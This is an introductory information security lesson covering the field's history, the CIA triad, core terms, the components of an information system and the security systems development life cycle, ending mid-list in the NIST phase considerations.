LESSON ONE INTRODUCTION TO INFORMATION SECURITY

Course Intended Learning Outcomes:

After you've finished reading this information, you should be able to:

• Define the concept of information security;

• Describe the evolution of computer security into information security by recounting
the history of computer security;
• Define important terms and concepts in information security;
• Identify the stages of the development life cycle for security systems; and
• Describe the functions of information security specialists in a company.

Information Security in the Past

Computer security is where the history of information security begins.

When the first mainframes, created to facilitate computations for communication code
breaking (see Figure 1-1), were put to use during World War II, the demand for computer
security — that is, the requirement to secure physical locations, hardware, and software
against threats-arose. To protect these mainframes and ensure the integrity of their data,
multiple levels of protection were created. Badges, keys, and security guards' facial recognition
of authorized personnel were used to control access to critical military facilities, for example.
As the necessity to ensure national security grew, computer security safeguards became
increasingly complicated and technologically advanced.
Information security was a simple procedure in those days, consisting primarily on
physical security and rudimentary document classification techniques. Physical theft of
equipment, espionage against the systems' products, and sabotage were the main security
risks.

Figure 1-1 The Enigma Machine

The decade of the 1960s

Many more mainframes were brought online during the Cold War to perform more
complicated and sophisticated jobs. It became important to make it possible for these
mainframes to interact using a less time- consuming method than mailing magnetic tapes
between data centers. The Department of Defense's Advanced Research Project Agency
(ARPA) began investigating the feasibility of a redundant, networked communications system
to support the military's information exchange in response to this necessity. From the
beginning, Larry Roberts, dubbed the "Father of the Internet," developed the project, which
was known as ARPANET. The ARPANET was the Internet's forerunner (see Figure 1-2 for an
excerpt from the ARPANET Program Plan).

ARPANET Program Plan June 3, 1968

Figure 1-2 Development of the ARPANET Program Plan3 Source: Courtesy of Dr. Lawrence
Roberts
1970s and 1980s

ARPANET gained in popularity and use over the next decade, increasing the potential for abuse.
Robert M. "Bob" Metcalfe, the man who is credited with inventing Ethernet, one of the most
widely used networking protocols, saw major flaws in ARPANET security. Individual remote
locations lacked the controls and safeguards needed to keep data safe from unwanted remote
users. Other issues included password structure and format vulnerability, a lack of safety
procedures for dial-up connections, and a lack of user identification and permission to the
system. Hackers have easy access to ARPANET because phone numbers were widely circulated
and openly advertised on the walls of phone booths. Because of the wide breadth and
frequency of computer security infractions, as well as the expansion in the number of hosts and
users on ARPANET, network security was dubbed "network insecurity" in 1978. It was centered
on an ARPA project to discover operating system security flaws. (See Table 1-1 for a timeline that
covers this and other significant computer security studies.)
The Rand Report R-609, a single report sponsored by the Department of Defense that
attempted to define the many controls and processes necessary for the protection of a
multilevel computer system, sparked a movement toward security that went beyond guarding
physical places. The document was kept secret for almost a decade and is now regarded as the
paper that kick-started the field of computer security research.
In the spring and summer of 1967, researchers raised concerns about the security-or lack
thereof of systems sharing resources within the Department of Defense. Systems were rapidly
being acquired at the time, and safeguarding them was a top priority for both the military and
defense industry.
Table 1-1 Key Dates for Seminal Works in Early Computer Security

Date Documents

1968 In Time-Sharing Computer Systems, Maurice Wilkes examined password security.

1973 In "Preliminary Notes on the Design of Secure Military Computer Systems," Schell,
Downey, and Popek looked at the need for more security in military systems.

1975 In the Federal Register, the Federal Information Processing Standards

(FIPS) evaluated the Digital Encryption Standard (DES).

1978 Bisbey and Hollingworth published "Protection Analysis: Final Report," a report
on the ARPA-funded Protection Analysis project, which aimed to better
understand operating system security vulnerabilities and investigate the
possibility of automated vulnerability detection techniques in existing system
software.

1979 "Password Security: A Case History," written by Morris and Thompson, was
published in the Communications of the Association for Computing Machinery
(ACM). The study looked at the evolution of a password security method for a
time- sharing system that may be accessed remotely.

1979 Dennis Ritchie published "On the Security of UNIX" and "Protection of Data File
Contents," which describe secure user and group IDs, as well as the challenges
that these systems have.

1984 The authors of "UNIX Operating System Security" addressed four

"key handles to computer security" in this report: physical control of premises
and computer facilities, management
commitment to security objectives, staff education, and administrative
procedures aiming at increased security.
 1984 "No technique can be secure against wiretapping or its equivalent on the
computer," Reeds and Weinberger wrote in "File Security and the UNIX System
Crypt Command." As a result, no technique can be guaranteed to be secure
against the systems administrator or other privileged users... the uninitiated user
has no chance.

The Advanced Research Projects Agency established a task group in June 1967 to
investigate the method of safeguarding secret information systems. The Task Force was formed
in October 1967 and met on a regular basis to develop suggestions that eventually became the
Rand Report R-609. The Rand Report R-609 was the first widely acknowledged published
document to address the significance of management and policy issues in computer security. It
was highlighted that the widespread usage of networking components in military information
systems presented security concerns that were not reduced by the usual security policies in
place at the time. This study was a watershed point in computer security history, when the
focus of computer security shifted from physical location and hardware security to encompass
the following:

1. Data protection;
2. Restricting illegal and sporadic access to that data;
3. Involving workers from various levels of the firm in information security issues.

MULTICS is notable because it was the first operating system to integrate security into
its basic functions, despite the fact that it is now obsolete. It was a time-sharing operating
system for mainframe computers created by a team of General Electric (GE), Bell Labs, and the
Massachusetts Institute of Technology in the mid-1960s (MIT). Not long after the MULTICS
project was restructured in mid-1969, several of its developers (Ken Thompson, Dennis
Ritchie, Rudd Canaday, and Doug McIlro) established UNIX, a new system. The UNIX system did
not have several security levels or passwords, whereas the MULTICS system had. Its main
purpose, text processing, did not necessitate the same level of security as its predecessor. Even
the most basic component of security, the password function, did not become a component
of UNIX until the early 1970s. The microprocessor gave rise to the personal computer and a
new era of computing in the late 1970s. The PC evolved into the workhorse of modern
computing, displacing the data center. In the 1980s, the decentralization of data processing
systems paved the way for networking, or the interconnection of personal computers and
mainframe computers, allowing the whole computing community to pool their resources.
The Decade of the 1990s

Networks of computers became more popular at the end of the twentieth century, as
did the necessity to connect these networks to one another. The Internet, the first worldwide
network of networks, was born as a result of this. In the 1990s, the Internet was made available
to the general people after previously being restricted to government, university, and industry
experts. Almost any computer that could connect to a phone line or an Internet-connected local
area network could use the Internet (LAN). The Internet became omnipresent when it was
commercialized, reaching practically every corner of the planet with an ever-expanding range
of applications.
The Internet has grown from a means for sharing Defense Department information to an
interconnection of millions of networks. Because industry standards for network
interconnection did not exist at the time, these connections were initially based on de facto
standards. These de facto standards offered nothing to secure information security, while some
security was introduced as these precursor technologies were extensively adopted · and
established industry standards. Early Internet deployment, on the other hand, placed a low
focus on security. In reality, many of the current problems with e-mail on the Internet are the
result of this early security flaw. Mail server authentication and e-mail encryption did not
appear required at the time, when all Internet and e-mail users were (apparently trustworthy)
computer scientists. Security was embedded into the physical environment of the data center
that housed the computers in early computing approaches. As networked computers became
the norm, the capacity to physically safeguard a networked computer was gone, and the
information stored on the computer became more vulnerable to security risks.

From 2000 to the Present

Today, the Internet allows millions of insecure computer networks to communicate with one
another in real time. The security of each computer's stored data is now dependent on the
security of every other computer to which it is linked. In recent years, governments and
businesses have become more aware of the need to improve information security, as well as
the importance of information security to national defense. The growing threat of cyber-
attacks has made governments and businesses more aware of the need to defend computer-
controlled control systems of utilities and other critical infrastructure. There is also growing
concern about nation-states engaging in information warfare, as well as the prospect that
undefended commercial and personal information systems will be victims.

What Exactly Is Security?

In general, security is defined as "the characteristic or state of being secure- to be free from
risk." In other words, the goal is to guard against adversaries- those who would damage or
unintentionally. National security, for example, is a multilayered structure that safeguards a
state's sovereignty, assets, resources, and citizens. A complex system is also required to achieve
the proper level of security for a business.
 To safeguard its operations, a successful company should have the following numerous layers
of security in place:

1. Physical security is preventing illegal access to and misuse of physical items, objects,
or spaces.

2. Personnel security refers to the safeguarding of an individual or a group of individuals who

have been granted access to an organization's operations.

3. Operations Security is to safeguard the specifics of a certain operation or series of actions.

4. Communication security is to protect communications medium, equipment,
and content, communications security is necessary.

5. Network security refers to the safeguarding of networking components, connections, and

data.

6. Information security refers to safeguarding the confidentiality, integrity, and availability

of data assets while they are being stored, processed, or transmitted. It is accomplished by
the use of policy, education, training, and awareness, as well as technology.

Information security is defined by the Committee on National Security Systems (CNSS) as

the protection of information and its critical elements, such as the systems and hardware that
use, store, and transmit that information. Information security encompasses the broad areas of
information security management, computer and data security, and network security, as shown in
Figure 1-3. The CNSS model of information security emerged from the C.L.A. triangle, a concept
developed by the computer security industry. Since the invention of the mainframe, the C.I.A.
triangle has been the industry standard for computer security. It is built on the three qualities of
information that make it valuable to businesses: confidentiality, integrity, and availability. The
security of these three information qualities is as crucial now as it has always been, yet the C.I.A.
triangle model no longer fully handles the ever- changing environment. Dangers to information
confidentiality, integrity, and availability have morphed into a wide range of events, including
unintentional or intentional damage, destruction, theft, unintended or unauthorized change, or
other misuse from human or nonhuman threats. The development of a more robust model that
handles the intricacies of the contemporary information security environment has been
motivated by the new environment of many continually emerging threats. The enlarged model
includes a list of essential information qualities, which are discussed in the next section. Because
of the range of content that is based on the C.I.A. triangle.
Figure 1.3 Components of Information Security Source Course Technology/Cengage
Learning
The Basics of Information Security
1. Access. The ability of a subject or thing to manipulate, modify, or influence another
subject or object. Hackers have unauthorized access to a system, whereas authorized users
have legal access. This ability is governed by access controls.

2. Asset. The resource that is being safeguarded within the organization. A logical asset, such
as a Web site, information, or data, or a physical asset, such as a person, computer system,
or other tangible thing, are both examples of assets. Security activities are focused on
assets, particularly information assets, which are what such efforts are aiming to protect.

3. Attack. An act that can harm or compromise information and/or the systems that support it,
whether intentionally or unintentionally. Attacks can be direct or indirect, active or passive,
purposeful or inadvertent. A passive attack occurs when someone casually reads sensitive
information that was not intended for their use. An attempt to break into an information
system by a hacker is a deliberate attack. An unintended attack is a lightning strike that causes
a building fire. A hacker using a personal computer to break into a system is known as a direct
attack. A hacker who compromises a system and uses it to attack other systems, such as part
of a botnet, is committing an indirect assault (slang for robot network). This set of hacked
machines, running software chosen by the attacker, can attack systems and steal user
information or execute distributed denial-of-service assaults autonomously or under the
attacker's direct supervision. The threat itself is the source of direct attacks. Indirect attacks
are launched through a hacked system or resource that is malfunctioning or under the control
of a threat.

4. Control, safeguard, or countermeasure. Mechanisms, rules, or methods for successfully

countering assaults, reducing risk, resolving vulnerabilities, and otherwise improving an
organization's security.

5. Exploit. A method for compromising a system. This phrase could be a noun or a verb. Threat
agents may try to take advantage of a system or other information asset by abusing it for
personal gain. An exploit, on the other hand, can be a defined procedure for exploiting a
vulnerability or exposure in software that is either inherent in the product or devised by the
attacker. Existing software tools or custom-made software components are used in exploits.

6. Exposure. Being exposed is a condition or state. When a vulnerability known to an

attacker is present, it is referred to as exposure in information security.

7. Loss. A single instance of an information asset being damaged or being modified or

disclosed in an unanticipated or illegal manner. When a company's data is stolen, the
company suffers a loss.

8. Protection profile or security posture. The whole collection of controls and protections.
that the business adopts (or fails to apply) to preserve the asset, including policy, education,
training and awareness, and technology. Although the security program generally includes
managerial components of security, such as planning, people, and subordinate programs, the
phrases are occasionally used interchangeably with the term security program.

9. Risk. The likelihood that something unfavorable will occur. Organizations must reduce risk
to fit their risk appetite, or the amount and type of risk they are willing to take. 10. Subjects
and objects. As shown in Figure 1-5, a computer can be the subject of an attack-an agent
entity used to carry out the attack-or the target of an attack-the target entity. When, for
example, a computer is compromised (object) and subsequently used to attack other
systems, it might be both the subject and the object of an attack (subject).

11. Threat. A group of items, people, or other entities that pose a threat to a valuable asset.
Threats exist at all times and can be directed or undirected. Hackers, for example, target
unsecured information systems on intent, whereas strong storms, on the other hand, threaten
buildings and their contents by accident.

12. Threat Agent. A threat's specific instance or component. For example, all hackers
worldwide provide a common threat, whereas Kevin Mitnick, who was convicted of hacking
into phone systems, is a specific threat agent. A lightning strike, a hailstorm, or a tornado, for
example, is a threat agent that is part of the severe storm threat. 13. Vulnerability. A flaw in a
system or defense mechanism allows it to be attacked or damaged. A software defect, an
unguarded system port, and an unlocked door are all instances of vulnerabilities. Some well-
known flaws have been investigated, recorded, and published; others are still hidden (or
undiscovered)
Crucial Characteristics Information

Information's worth is determined by the properties it possesses. When a property of

information changes, its value either rises or falls, depending on the situation. Some features
have a greater impact on the value of information to users than others. This can vary
depending on the situation; for example, information timeliness is important because
information loses a lot of its value if it is given late. Though both information security experts
and end users have a common knowledge of information characteristics, tensions can occur
when the necessity to protect data from risks clashes with the end users' need for unrestricted
access to the data. End consumers, for example, may consider a tenth-of- second delay in data
calculation to be an unwanted irritation. Professionals in the field of information security, on
the other hand, may regard a tenth of a second as a little lag that facilitates a critical activity,
such as data encryption. The extended C.I.A. triangle represents each important characteristic
of information.

The CIA Triad

AVAILABILITY. It permits authorized users-persons or computer systems-to access information

without interference or obstruction and to receive it in the proper format. Consider research
libraries, which require identification before admission. The contents of the library are
protected by librarians so that only authorized patrons have access to them. Before a patron
gets free access to the book stacks, the librarian must accept identification. When approved
users get access to the stacks, they expect to discover the material they need in a usable format
and in a language they understand, which in this case usually means bound in a book and
written in English.
ACCURACY. When information is free of faults or errors and has the value that the end user
expects, it is said to be accurate. If data have been altered, whether purposefully or
unintentionally, it is no longer accurate. Take a bank account, for example. You believe that the
information on your checking account is a true reflection of your financial situation. External or
internal faults can lead to incorrect information in your checking account. The value of the
information is affected if a bank teller, for example, incorrectly adds or subtracts too much from
your account. Alternatively, you could enter an inaccurate amount into account register by
accident. In any case, an incorrect bank balance could lead to errors, such as bouncing a check.
AUTHENTICITY. Information authenticity refers to the attribute or state of being genuine or
original, as opposed to a copy or fabrication. When information is in the same state as when it
was created, placed, saved, or transferred, it is said to be authentic. Consider some popular e-
mail misconceptions for a moment. When you get e-mail, you assume it was created and sent
by a certain person or group-you assume you know where the e-mail came from. This isn't
always the case, though. The act of sending an e-mail message with a modified field, known as
e-mail spoofing, is an issue for many individuals nowadays, because the modified field is
frequently the originator's address. Spoofing the sender's address can receive e-mail recipients
into believing that messages are real, causing themmto open e-mail that they would not have
otherwise. Spoofing can also change data being sent over a network, like in the example of
user data protocol (UDP) packet spoofing, which allows an attacker to get access to data saved
on computers.

Phishing is a type of spoofing in which an attacker tries to get personal or financial

information through deception, most commonly by impersonating another person or
organization. When done by law enforcement or private detectives, pretending to be someone
you are not is referred to as pretexting. When employed in a phishing attack, e-mail spoofing
leads users to a Web server that does not represent the organization it claims to represent,
with the goal of stealing personal information such account numbers and passwords.

Pretending to be a bank or brokerage firm, an e-commerce corporation, or an Internet service

provider are the most typical variations. Pretexting does not always result in a satisfying end,
even when it is authorized. Patricia Dunn, the CEO of Hewlett-Packard, gave contract
investigators permission to "smokeout" a corporate director suspected of leaking private
information in 2006. Ms. Dunn eventually left the company due to the unfavorable press that
resulted from the incident.
CONFIDENTIALITY. When information is safeguarded from disclosure or exposure to
unauthorized individuals or systems, it is said to be confidential. Confidentiality ensures that
only those with the necessary rights and privileges have access to information. Confidentiality is
violated when information is viewed by unauthorized individuals or systems. You can take a
number of steps to maintain information confidentially, including the following:

1. Classification of data;
2. Document storage that is secure;
3. Implementation of broad security policies;
4. Information custodians and end users must be educated.
Confidentiality, like the majority of information traits, is interdependent on others, and it is
most closely tied to the characteristic known as privacy. In Chapter 12, "Legal and Ethical
Issues in Security," the relationship between these two traits is discussed in greater depth.
When it comes to personal information regarding employees, customers, or patients, secrecy is
extremely important. Individuals who trade with an organization, whether it is a federal agency
like the Internal Revenue Service or a corporation, want their personal information to be kept
private. When businesses reveal confidential information, problems develop. Sometimes this
exposure is purposeful, but there are occasions when revelation of sensitive information
happens by mistake-for example, when confidential material is accidentally e-mailed to
someone outside the business rather than to someone inside the organization. Offline:
Unintentional Disclosures details several incidents of privacy violations.
Other examples of confidentiality breaches include an employee discarding a document
containing sensitive information without shredding it, or a hacker successfully breaking into a
Web-based organization's internal database and stealing sensitive client information such as
names, addresses, and credit card numbers.
Almost every day, as a customer, you give up pieces of personal information in exchange for
convenience or value. You reveal part of your spending patterns by utilizing a "members only"
card at the grocery shop. When you participate in an online survey, you are exchanging
elements of your personal history in exchange for internet access. Your personal information is
duplicated, sold, replicated, and circulated in bits and pieces, eventually coalescing into profiles
and even whole dossiers about yourself and your life. Salami theft is a criminal enterprise that
employs a similar strategy. A deli worker understands that stealing an entire salami is
impossible, but a few pieces here and there may be taken home without being noticed. The deli
employee eventually steals a full salami. Salami theft occurs in information security when an
employee steals a few pieces of data at a time, knowing that taking more would be caught, but
finally the person acquires something complete or usable.

INTEGRITY. When information is whole, complete, and uncorrupted, it has integrity. When
information is vulnerable to corruption, damage, destruction, or other disruption of its
authentic state, its integrity is jeopardized. Information might be corrupted as it is being stored
or delivered. Many computer viruses and worms are created with the express intent of causing
data corruption. As a result, looking for changes in file integrity as indicated by the file's size is a
significant way for detecting a virus or worm. File hashing is another important way of ensuring
information integrity, in which a file is read by a particular algorithm that computes a single big
integer called a hash value based on the value of the bits in the file. Any combination of bits
has a unique hash value. If a computer system applies the same hashing technique to a file and
obtains a number that differs from the file's recorded hash value, the file has been
compromised, and the information's integrity has been lost. Because information is of no value
or use if users cannot verify its integrity, information integrity is the cornerstone of information
systems.
External influences, such as hackers, aren't always to blame for file corruption. Noise in the
transmission medium, for example, might cause data to be corrupted. When data are
transmitted on a circuit with a low voltage level, the data can be altered and corrupted.
Internal and external hazards to information integrity can be compensated for using
redundancy bits and check bits. Algorithms, hash values, and error-correcting codes protect
the integrity of the data during transmission. Data that have had its integrity tampered with
are resent.
UTILITY. The attribute or state of having value for some goal or end is known as information
utility. When information can be used for a certain purpose, it is valuable. It is useless to have
information that is available but not in a manner that is understandable to the end user. To a
private citizen in the United States, for example. For a politician, though, census data may
quickly become overwhelming and difficult to analyze. Census data offer details on a district's
residents, such as ethnicity, gender, and age. These data can aid in the development of a
politician's future campaign strategy.
POSSESSION. The quality or state of ownership or control of information is referred to as
"possession." If one acquires information, regardless of format or other features, it is said to be
in one's possession. While a violation of confidentiality always results in a breach of possession,
a breach of possession does not necessarily result in a breach of confidentiality. Assume a
corporation uses an encrypted file system to keep its important customer data. An ex-
employee plans to duplicate the tape backups and sell the customer information to the
competition. A breach of custody occurs when the tapes are removed from their secure
environment. However, because the data are encrypted, neither the employee nor anyone else
can read it without the correct decryption tools; thus, no breach of confidentiality has
occurred. People who sell company secrets now face more harsh fines and the possibility of jail
time. Furthermore, employers are becoming increasingly hesitant to recruit people who have a
history of dishonesty.

Components of an Information System

An information system (IS), as shown in Figure 1-7, is much more than computer hardware; it
is the full combination of software, hardware, data, people, procedures, and networks that
enable the company to utilize information resources. Information can be input, processed,
output, and stored using these six important components. Each of these IS components has its
own set of strengths and weaknesses, as well as unique features and applications.
Additionally, each component of the information system has its own set of security needs.

SOFTWARE. Applications, operating systems, and various command utilities make up the
software component of the IS. Perhaps the most challenging IS component to safeguard is
software. A significant chunk of information- related attacks is based on exploiting faults in
software programming.
Reports of holes, bugs, vulnerabilities, or other basic faults in software abound in the
information technology sector. In truth, defective software affects many aspects of daily life,
from smartphone crashes to faulty vehicle control computers that result in recalls. Software is
the lifeblood of an organization's information flow. Unfortunately, software products are
frequently developed under project management limitations, which limit time, money, and
people. Information security is frequently introduced as an afterthought rather than being
created as a core component from the start. As a result, software programs become an easy
target for unintentional or deliberate attacks.
HARDWARE. Hardware refers to the physical technology that contains and executes software,
stores, and transfers data, and provides interfaces for entering and removing data from a
system. Physical security policies deal with hardware as a physical asset and how to keep it safe
from harm or theft. Traditional physical security methods, such as locks and keys, restrict
access to and interaction with an information system's hardware components. Because a
breach of physical security might result in the loss of information, it is critical to secure the
physical location of computers as well as the computers themselves. Unfortunately, most
information systems are constructed on hardware platforms that, if unlimited access to the
hardware is permitted, cannot ensure any level of information security.
Laptop thefts in airports were prevalent before September 11, 2001. As the computer's owner
ran it through the conveyor scanning equipment, a two- person team worked to take it. The
first assailant entered the security area ahead of an unwitting target and proceeded fast. The
second offender then stood behind the victim, waiting for the target to place his or her
computer on the luggage scanner. While the computer was being processed, the second agent
sneaked ahead of the victim and approached the metal detector with a large collection of keys,
coins, and other valuables, stalling the process and allowing the first criminal to grab the
computer and flee through a packed walkway. While the security reaction to the terrorist
attacks of September 11, 2001 tightened airport security, hardware can still be stolen in
airports and other public places. Although laptops and notebook computers are expensive, the
information contained within them can be worth a lot more to businesses and people.
DATA. A computer system's data must be protected while it is being stored, processed, and
transmitted. Data are frequently an organization's most important asset, yet it is also the
subject of malicious assaults. Database management solutions are likely to be used in systems
built in recent years. When done correctly, this should increase the data and application's
security. Unfortunately, many system developments projects do not fully utilize the database
management system's security features, and the database is sometimes deployed in less
secure ways than traditional file systems.
PEOPLE. People have long been a concern to information security, while being frequently
neglected in computer security considerations. According to legend, about 200 B.C. The
Chinese empire's security and stability were endangered by a massive army. The Hun invaders
were so terrible that the Chinese emperor ordered the construction of a massive wall to guard
against them. Kublai Khan ultimately accomplished what the Huns had been attempting for
thousands of years about 1275 A.D. The Khan's army attempted to climb over, dig beneath, and
break through the wall at first.
The Khan simply bribed the gatekeeper in the end, and the rest is history. Whether or not this
incident occurred, the moral of the story is that individuals can be the weakest link in a
company's information security program. Individuals will continue to be the weakest link until
policy, education and training, awareness, and technology are appropriately implemented to
prevent people from mistakenly or intentionally harming or losing information. The human
desire to cut corners and the ubiquitous character of human error can be exploited by social
engineering. It can be used to control people's actions in order to gain access to system
information.
PROCEDURES. Procedures are another aspect of an IS that is usually disregarded. Procedures
are step-by-step instructions for completing a task. When an unauthorized user obtains an
organization's methods, the integrity of the data is jeopardized. For example, a bank consultant
learnt how to wire funds utilizing processes that were easily available at the computer center.
This bank consultant ordered millions of dollars to be wired to his own account by taking
advantage of a security flaw (lack of verification). Before the matter was resolved, lax security
practices resulted in a loss of over 10 million dollars. Most companies offer procedures to their
legitimate employees so that they can access the information system, but many of them fail to
provide adequate training on how to secure the processes. As crucial as physically securing the
information system is educating staff about security protocols. Procedures, after all, are data in
and of themselves. As a result, knowledge of processes, like other vital information, should only
be shared with individuals of the organization who need to know.
NETWORKS. The networking component of IS is responsible for most of the demand for better
computer and information security. When information systems are linked to form local area
networks (LANs), and these LANs are linked to other networks, such as the Internet, new
security concerns emerge quickly. Physical technology that supports network services is
becoming increasingly affordable for businesses of all sizes. Traditional physical security
methods, such as locks and keys, are still useful for restricting access to and interaction with
the hardware components of an information system; but, when computer systems are
networked, this technique is no longer sufficient. Network security measures, as well as the
development of alarm and intrusion systems to alert system owners to ongoing intrusions, are
critical.

Balancing Information Security and Access

It is difficult to achieve complete information security even with the best design and
implementation. Remember James Anderson's statement, where he stressed the importance of
balancing security and access. Information security is a process, not a goal, so it can't be perfect.
It is possible to make a system accessible to anyone, anywhere, at any time, and using any
method. However, such unrestricted access jeopardizes the information's security. A totally
secure information system, on the other hand, would not allow anyone access. When Microsoft
was challenged to get a TCSEC C-2 level security certification for its Windows operating system,
for example, it had to disable all networking components and run the computer solely from a
console in a secure room.
The security level must allow fair access while protecting against risks in order to establish
balance-that is, to operate an information system that satisfies both the user and the security
expert. When it comes to balancing information security and access, Figure 1-8 depicts some
of the competing voices that must be considered. Due to today's security concerns and
difficulties, an information system or data-processing department can become too invested in
system management and security. When the end user's demands are overshadowed by a
focus on safeguarding and administering information systems, an imbalance can arise. Both
information security professionals and end users must understand that the organization's
overall aims are the same: to ensure that data are available when, when, and how it is needed,
with the fewest delays and impediments possible. Even after worries regarding loss, damage,
interception, or destruction have been resolved, this level of availability can be met in a
perfect society.

Approaches to Information Security Implementation

Information security deployment in a business must start somewhere and cannot happen
overnight. Securing data assets is a gradual process that involves teamwork, time, and patience.
Information security might start with a grassroot effort by system administrators to improve
their systems' security. A bottom-up strategy is what this is known as. The technical expertise
of individual administrators is a fundamental benefit of the
bottom-up approach /strategy. Working with information systems on a daily basis, these
administrators have a wealth of experience that can substantially aid the construction of a
security system. They are aware of and comprehend the dangers to their systems, as well as the
processes required to successfully protect them. Unfortunately, because it lacks a number of
important elements, such as participant support and organizational staying power, this
technique rarely works.
The top-down strategy, in which upper-level managers launch the project by issuing policy,
procedures, and processes, dictating the goals and expected outcomes, and assigning
responsibilities for each required activity, has a greater success rate. Strong upper-
management support, a devoted champion, usually dedicated financing, a clear planning and
implementation procedure, and the ability to influence corporate culture are all features of this
method. A formal development plan known as a systems development life cycle, is also used in
the most successful top-down approach.

Management must completely support and buy into any organization-wide endeavor for it to
succeed. The champion's contribution to this effort cannot be emphasized. This advocate is
usually an executive, such as a chief information officer or vice president of information
technology, who drives the project ahead, ensures that it is appropriately managed, and
pushes for widespread support. Many mid-level administrators fail to make time for the project
or consider it as a low priority without this high-level backing. The end users' engagement and
support are also crucial to the success of this type of project. These people are the ones who
will be most affected by the project's process and outcome, so they must be included in the
information security process. A development team, known as the joint application
development (JAD) team, should be assigned to key end users. The JAD needs to be tenacious
in order to succeed. It must be able to withstand employee turnover and should not be
vulnerable to changes in the information security system's development team. This means that
processes and procedures must be recorded and embedded into the culture of the firm. The
organization's management must accept and promote them.' Figure 1-9 depicts the
organizational hierarchy as well as the bottom-up and top-down techniques.

The Systems Development Life Cycle

Information security must be managed in the same way that any other key system in a business
is controlled. A version of the systems development life cycle (SDLC) called the security systems
development life cycle can be used to construct an information security system in an
organization with little or no formal security in place (SecSDLC). To comprehend a security
systems development life cycle, you must first comprehend the fundamentals of the
methodology.

Methodology and Phases

A methodology for the design and execution of an information system is the systems
development life cycle (SDLC). A methodology is an organized sequence of methods used to
solve an issue in a formal manner. Using a methodology ensures a thorough procedure with a
clear objective, increasing the likelihood of success. Following the adoption of a methodology,
major milestones are created, and a team of personnel is chosen and held- accountable for
achieving the project's objectives.
The classic SDLC is divided into six stages. You may have been exposed to a model with a
different number of phases if you took a system analysis and design course. SDLC models can
contain anything from three to twelve phases, which have all been mapped into the six shown
above. Figure 1.10 depicts a waterfall model in which each phase starts with the outcomes and
information gathered in the preceding phase.
A structured review or reality check follows each phase, during which the team decides
whether the project should be continued, discontinued, outsourced, postponed, or returned
to an earlier phase, based on whether the project is progressing as planned and the need for
additional expertise, organizational knowledge, or other resources.
Once the system is up and running, it is maintained (and modified) for the rest of its life. As the
cycle is repeated over time, every information system implementation may have several
iterations. Only through ongoing analysis and renewal will it be able to adapt to the always
changing environment in which it is positioned. Each phase of the classic SDLC.

INVESTIGATION. The most crucial part is the first, which is the investigation. What is the
objective of the system being developed? An evaluation of the event or plan that started the
process is the first step in the investigation phase. The project's objectives, restrictions, and
scope are defined during the investigation phase. The perceived benefits and the acceptable
cost levels for those benefits are evaluated in a preliminary cost-benefit analysis. A feasibility
study analyzes the process's economic, technological, and behavioral feasibility at the end of
this phase, as well as every subsequent step, and assures that it is worth the organization's time
and effort to adopt.
ANALYSIS. The information gathered during the investigation phase is used to begin the
analysis step. The organization's current systems, as well as its ability to support the new
systems, are the focus of this phase. The first step for analysts is to figure out what the new
system will be able to achieve and how it will interact with the old ones. The findings are
documented, and the feasibility analysis is updated at the end of this phase.
LOGIC DESIGN. The information collected from the analysis phase is used to begin constructing
a systems solution for a business problem in the logical design step. The first and most
important component in every system solution is the business need. Applications are chosen
to provide needed services based on the business need, and then data support and structures
capable of supplying the required inputs are chosen based on the business need. Finally,
particular technologies for implementing the physical solution are identified based on all of the
foregoing. As a result, the logical design serves as a blueprint for achieving the desired result.
There are no references to specific technologies, vendors, or products in the logical design
because it implementation independent. Instead, it focuses on how the suggested system will
help to solve the problem at hand. Analysts create a number of different solutions, each with
its own set of advantages and disadvantages, as well as prices and benefits, allowing for a
broad comparison of the possibilities available. Another feasibility study is carried out at the
end of this phase.

PHYSICAL DESIGN. Specific technologies are chosen during the physical design phase to
support the options identified and evaluated in the logical design. The chosen components are
assessed using a make-or-buy decision (develop the components in-house or purchase them
from a vendor).
Various components and technologies are integrated into the final designs. The full solution is
given to the organizational management for approval after yet another feasibility analysis.
IMPLEMENTATION. Any required software is produced during the implementation phase.
Ordered, received, and tested components. Following that, users are trained and
documentation is generated. All components are individually tested before being fitted and
tested as a system. A feasibility analysis is completed once more, and the system is given to
the sponsors for a performance evaluation and acceptance test.
MAINTENANCE AND CHANGE. The maintenance and change phase is the most time-consuming
and costly part of the process. The tasks required to support and change the system for the
balance of its useful life cycle are included in this phase. Despite the fact that formal
development may be completed during this phase, the project's life cycle continues until it is
judged that the process should be restarted from the investigation phase. The system is
examined for compliance at regular intervals, and the viability of continuing vs discontinuing is
assessed. Upgrades, patches, and updates are all taken care of. The systems that support the
organization must change as the organization's needs change. Those in charge of the systems,
as well as those who support them, must constantly monitor the systems' effectiveness in
relation to the organization's environment. When a present system can no longer support the
organization's evolving mission, the project is ended and a new one is started.
SECURING THE SDLC. The security of the system being created, as well as the information it
consumes, should be considered during each phase of the SDLC. The implementing
organization is responsible for ensuring that the system is utilized securely, whether it is
custom and designed from scratch, purchased, and subsequently adapted, or commercial off-
the-shelf software (COTS). This means that any system deployment is safe and does not
jeopardize the organization's information assets' confidentiality, integrity, or availability. The
section below, based from NIST Special Publication 800-64, rev. 1, gives an overview of security
considerations for each phase of the SDLC.
Each of the example SDLC phases [covered previously] has a minimal set of security
procedures that must be completed in order to properly integrate security into a system
throughout development. An organization will either employ the standard SDLC outlined
[before] or construct a customized SDLC to match their specific needs. In either scenario, NIST
advises companies to incorporate the following IT security considerations into their
development process:

Investigation/Analysis Phases

1. Security categorization- defines three categories of potential impact on organizations or

individuals in the event of a security breach (low, moderate, or high) (a loss of confidentiality,
integrity, or availability). Organizations can use security categorization standards to help them
choose the right security measures for their information systems.
2. Preliminary risk assessment- results in a first description of the system's basic security
requirements. The danger environment in which the system will function should be defined
by a preliminary risk assessment.

Logical/Physical Design Phases

1. Risk assessment is an examination that uses a formal risk assessment process to determine
the system's protection requirements. This analysis will expand on the initial risk assessment
conducted during the Initiation phase, but it will be more detailed and particular.

2. Security functional requirements analysis- an examination of needs that could comprise

the following elements: (1) the system security environment (i.e., enterprise information
security policy and enterprise security architecture) and (2) security functional requirements.

3. Security assurance requirements analysis- an examination of the requirements that address

the developmental activities and assurance evidence required to achieve the appropriate level
of confidence in the information security system's ability to function correctly and efficiently.
The analysis will be used to determine how much and what kind of assurance are required,
based on legal and functional security requirements.

4. Cost and reporting considerations- determines how much of the development cost may
be attributable to information security across the system's life cycle. Hardware, software,
staff, and training are all included in these expenditures.

5. Security planning guarantees that all agreed-upon security controls are thoroughly
documented whether they are planned or already in existence. The security plan also includes
attachments or references to key documents that support the agency's information security
program (e.g., configuration management plan, contingency plan, incident response plan,
security awareness and training plan, rules of behavior, risk assessment, security test
